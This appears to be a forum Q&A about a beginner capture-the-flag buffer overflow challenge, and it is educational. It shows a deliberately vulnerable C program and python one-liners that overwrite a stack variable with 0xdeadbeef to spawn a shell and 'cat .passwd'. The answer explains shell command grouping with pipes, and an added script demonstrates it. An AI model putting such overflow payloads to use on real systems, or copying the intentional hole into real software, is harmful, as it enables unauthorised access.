I'm a newbie in Linux and exploitation. I have tried to solve some exploitation challenges and I realized some interesting things.
[1] (python -c 'print "a"*40 + "\xef\xbe\xad\xde"'; cat) | ./ch13
and
[2] python -c 'print "a"*40 + "\xef\xbe\xad\xde"'; cat | ./ch13
When I use [1] my shellcode works correctly, and it doesn't work with the other. So, what effect did my shellcode have on the program? What is the difference between them?
And the last one,
[3] python -c 'print "a"*40 + "\xef\xbe\xad\xde\0" + " -c \"cat .passwd\""'
I tried passing the shellcode -c "cat .passwd"
as an argv to the program. But I got nothing!
Note: This is the program code (changed). The original fragment is shown here wrapped in a main() with its headers so it compiles; the overflow it contains is intentional (fgets reads up to 44 bytes into a 40-byte buffer, and the 4 extra bytes land in check):
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int check = 0x04030201;   /* sits right after buf in the challenge binary's stack frame */
    char buf[40];

    /* reads up to 44 bytes: bytes 41..44 of the input overwrite check */
    fgets(buf, 45, stdin);
    printf("\n[buf]: %s\n", buf);
    printf("[check] %p\n", check);
    if ((check != 0x04030201) && (check != 0xdeadbeef))
        printf("UUU\n");
    if (check == 0xdeadbeef)
    {
        printf("Opening your shell...\n");
        system("/bin/dash");
    }
    return 0;
}
Thanks for reading! I hope to be pointed to some documentation.
In the second version, the python output is not being piped to ./ch13, it gets printed on the screen. ; separates commands, so it's equivalent to:
python -c 'print "a"*40 + "\xef\xbe\xad\xde"'
cat | ./ch13
You need to group the two commands to get both of them to write to the pipe. You can do that either by putting them together in a subshell with (), or using grouping with {}:
{ python -c 'print "a"*40 + "\xef\xbe\xad\xde"'; cat; } | ./ch13
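The difference between the two command lines, as an added POSIX sh example that is not part of the question or the answer above. ./ch13 is replaced by a constructed stand-in (target) that only reports how many bytes reached its stdin; payload stands in for the python command and keystrokes for what cat would forward from the terminal. Assumed sizes: the payload is 9 bytes, the keystrokes 12.

```shell
#!/bin/sh
# Added example: why '(cmd1; cmd2) | prog' feeds both commands into prog
# while 'cmd1; cmd2 | prog' feeds only cmd2.

# Constructed stand-in for ./ch13: print the number of bytes read from stdin.
target() { wc -c | tr -d ' \n'; }

# Stand-in for python -c 'print "a"*4 + "\xef\xbe\xad\xde"': 4 filler bytes,
# the 4 payload bytes (octal escapes are POSIX; \x escapes are not), newline = 9 bytes.
payload() { printf 'aaaa\357\276\255\336\n'; }

# Stand-in for what 'cat' would copy from the terminal into the spawned shell: 12 bytes.
keystrokes() { printf 'cat .passwd\n'; }

# Form [2] from the question: ';' terminates 'payload' as a complete command,
# so the pipeline is only 'keystrokes | target'. The payload goes to the
# shell's own stdout (the screen), never to target.
ungrouped() { payload; keystrokes | target; }

# Form [1]: a subshell is one compound command; its combined stdout is the pipe.
grouped_subshell() { ( payload; keystrokes ) | target; }

# Same effect with brace grouping (no extra process; note the ';' before '}').
grouped_braces() { { payload; keystrokes; } | target; }

# Helper: target's report is the last line a form writes to stdout.
bytes_seen_by_target() { "$@" | tail -n 1; }

# Helper: everything before target's report leaked to the screen instead.
leaked_to_screen() { "$@" | sed '$d' | wc -c | tr -d ' \n'; }

echo "ungrouped:        target saw $(bytes_seen_by_target ungrouped) bytes, $(leaked_to_screen ungrouped) leaked to the screen"
echo "grouped_subshell: target saw $(bytes_seen_by_target grouped_subshell) bytes, $(leaked_to_screen grouped_subshell) leaked to the screen"
echo "grouped_braces:   target saw $(bytes_seen_by_target grouped_braces) bytes, $(leaked_to_screen grouped_braces) leaked to the screen"
```

With the real binary the consequence of form [2] is that the 44-byte overflow never reaches fgets, so check keeps its value and no shell is spawned; with [1] the overwrite lands and cat keeps the pipe open so you can type into the /bin/dash that system() starts.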